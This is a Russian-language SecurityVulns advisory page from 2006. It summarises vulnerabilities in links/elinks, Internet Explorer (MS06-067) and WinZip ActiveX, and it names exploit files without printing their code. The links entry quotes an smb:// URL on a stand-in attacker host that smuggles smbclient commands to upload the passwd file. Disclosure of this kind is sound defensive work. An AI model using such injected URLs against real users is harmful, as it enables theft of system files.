Информационная безопасность
[RU] switch to English


Проблема шел-символов в links (shell characters)
Опубликовано:15 ноября 2006 г.
Источник:
SecurityVulns ID:6828
Тип:клиент
Уровень опасности:
6/10
Описание:Проблема шел-символов при вызове внешней команды smbclient при обработке URL типа 'smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd etc; put passwd ; exit; '
Затронутые продукты:LINKS : links 1.0
 ELINKS : elinks 0.11
Оригинальный текстdocumentTeemu Salmela, [Full-disclosure] Links smbclient command execution (15.11.2006)

Переполнение буфера в daxctle.ocx и при разборе HTML Microsoft Windows (buffer overflow)
дополнено с 13 сентября 2006 г.
Опубликовано:15 ноября 2006 г.
Источник:
SecurityVulns ID:6614
Тип:клиент
Уровень опасности:
9/10
Описание:Переполнение буфера динамической памяти в ActiveX объекте DirectAnimation.PathControl метод KeyFrame. переполнение буера в опции CSS Float. Может быть использовано для скрытой установки вредоносного кода.
Затронутые продукты:MICROSOFT : Windows 2000 Server
 MICROSOFT : Windows 2000 Professional
 MICROSOFT : Windows XP
 MICROSOFT : Windows 2003 Server
Оригинальный текстdocumentZDI, [Full-disclosure] ZDI-06-041: Microsoft Internet Explorer CSS Float Property Memory Corruption Vulnerability (15.11.2006)
 documentMICROSOFT, Microsoft Security Bulletin MS06-067 Cumulative Security Update for Internet Explorer (922760) (14.11.2006)
Файлы:Internet Explorer COM Object Heap Overflow Download Exec Exploit
 Microsoft Security Bulletin MS06-067 Cumulative Security Update for Internet Explorer (922760)

Переполнение буфера через ActiveX в WinZip (buffer overflow)
дополнено с 15 ноября 2006 г.
Опубликовано:3 января 2007 г.
Источник:
SecurityVulns ID:6829
Тип:клиент
Уровень опасности:
6/10
Описание:Переполнение буфера в элементе WZFILEVIEW.FileViewCtrl.61.
Затронутые продукты:WINZIP : WinZip 10.0
Оригинальный текстdocument76693223_(at)_163.com, WinZip FileView ActiveX controls CreateNewFolderFromName Method Buffer Overflow Vulnerability (03.01.2007)
 document76693223_(at)_163.com, WinZip10.0 FileView ActiveX Controls CreateNewFolderFromName Method Buffer overflow (03.01.2007)
 documentMicheal Turner, Re: [Full-disclosure] ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability (15.11.2006)
 documentZDI, ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability (15.11.2006)
Файлы:WinZip <= 10.0.7245 FileView ActiveX Buffer Overflow Exploit v2
 WinZip <= 10.0.7245 FileView ActiveX buffer overflow exploit
 Exploits WinZip FileView ActiveX controls CreateNewFolderFromName Method Buffer Overflow Vulnerability

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород